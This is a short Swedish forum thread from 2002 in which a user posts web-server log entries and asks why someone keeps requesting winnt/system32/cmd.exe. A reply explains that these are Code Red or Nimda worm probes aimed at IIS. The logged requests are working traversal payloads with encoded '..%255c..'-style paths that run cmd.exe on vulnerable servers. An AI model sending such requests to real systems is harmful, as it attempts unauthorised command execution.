access_log

Tråden skapades 2002-02-25 och har fått 3 svar. Det senaste inlägget skrevs 2002-02-25.

1

2002-02-25 11:05

#1

Saffran
Medlem ●
Malmö
2002-02-25 11:05

Jag gick in i ”Log Viewer/Web Service/access_logg” och då fann jag detta. Flera gånger i timmen är det någon som letar efter ett winnt/system32/ för att göra vad. Kommer det utifrån och från vem? Märkligt.

192.168.122.100 - - [24/Feb/2002:01:51:36 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276

192.168.122.100 - - [24/Feb/2002:01:51:36 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274

192.168.122.100 - - [24/Feb/2002:01:51:36 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284

192.168.122.100 - - [24/Feb/2002:01:51:36 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284

192.168.122.100 - - [24/Feb/2002:01:51:36 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

192.168.122.100 - - [24/Feb/2002:01:51:36 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315

192.168.122.100 - - [24/Feb/2002:01:51:37 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315

192.168.122.100 - - [24/Feb/2002:01:51:37 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331

192.168.122.100 - - [24/Feb/2002:01:51:37 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

192.168.122.100 - - [24/Feb/2002:01:51:37 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

192.168.122.100 - - [24/Feb/2002:01:51:37 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

192.168.122.100 - - [24/Feb/2002:01:51:37 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297

192.168.122.100 - - [24/Feb/2002:01:51:37 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281

192.168.122.100 - - [24/Feb/2002:01:51:37 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281

192.168.122.100 - - [24/Feb/2002:01:51:37 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

192.168.122.100 - - [24/Feb/2002:01:51:37 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

Anmäl Ändra Gilla Svara

2002-02-25 11:10

#2

Massebasse
Medlem ●
Växjö
2002-02-25 11:10

Hört talas om Code Red eller Nimda?
Det är Windowsvirus som försöker mucka med din Apache i tron att det är en IIS, och det har de ju inte mycket för ...